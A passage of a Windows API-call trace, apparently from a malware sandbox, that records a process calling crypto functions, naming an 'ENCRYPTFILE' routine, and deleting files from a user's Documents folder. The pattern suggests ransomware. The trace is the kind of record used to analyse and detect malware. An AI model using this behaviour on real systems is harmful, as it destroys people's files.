lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0077.622] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0077.622] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.622] FreeLibrary (hLibModule=0x756e0000) returned 1 [0077.622] CloseHandle (hObject=0x298) returned 1 [0077.622] CloseHandle (hObject=0x258) returned 1 [0077.626] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\O8- 8r.odt", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\O8- 8r.odt", lpFilePart=0x0) returned 0x24 [0077.626] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\O8- 8r.odt" (normalized: "c:\\users\\fd1hvy\\documents\\o8- 8r.odt")) returned 0x20 [0077.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0077.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0077.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0077.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.626] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\O8- 8r.odt", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fb2180, ftCreationTime.dwHighDateTime=0x1d5e306, ftLastAccessTime.dwLowDateTime=0x7511100, ftLastAccessTime.dwHighDateTime=0x1d5e6b5, ftLastWriteTime.dwLowDateTime=0x7511100, ftLastWriteTime.dwHighDateTime=0x1d5e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x10245, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="O8- 8r.odt", cAlternateFileName="O8-8R~1.ODT")) returned 0x41ac6c0 [0077.626] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\O8- 8r.odt" (normalized: "c:\\users\\fd1hvy\\documents\\o8- 8r.odt")) returned 1 [0077.628] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fb2180, ftCreationTime.dwHighDateTime=0x1d5e306, ftLastAccessTime.dwLowDateTime=0x7511100, ftLastAccessTime.dwHighDateTime=0x1d5e6b5, ftLastWriteTime.dwLowDateTime=0x7511100, ftLastWriteTime.dwHighDateTime=0x1d5e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x10245, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="O8- 8r.odt", cAlternateFileName="O8-8R~1.ODT")) returned 0 [0077.628] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0077.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0077.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0077.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0077.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0077.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0077.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0077.629] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0077.629] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8970 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0077.629] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.629] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0077.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0077.629] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0077.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0077.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0077.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0077.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0077.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0077.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0077.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0077.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9908 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0077.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.630] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0077.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0077.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.631] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0077.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0077.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0077.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0077.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.631] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ooKroY8WpRTqCJ.xlsx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c3a9160, ftCreationTime.dwHighDateTime=0x1d5ea19, ftLastAccessTime.dwLowDateTime=0x30900180, ftLastAccessTime.dwHighDateTime=0x1d5e70e, ftLastWriteTime.dwLowDateTime=0x30900180, ftLastWriteTime.dwHighDateTime=0x1d5e70e, nFileSizeHigh=0x0, nFileSizeLow=0x13819, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="ooKroY8WpRTqCJ.xlsx", cAlternateFileName="OOKROY~1.XLS")) returned 0x41ac780 [0077.631] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0077.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0077.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.632] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0077.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c50 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0077.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0077.632] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0077.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.633] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0077.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d58 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0077.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0077.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0077.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0077.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0077.635] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 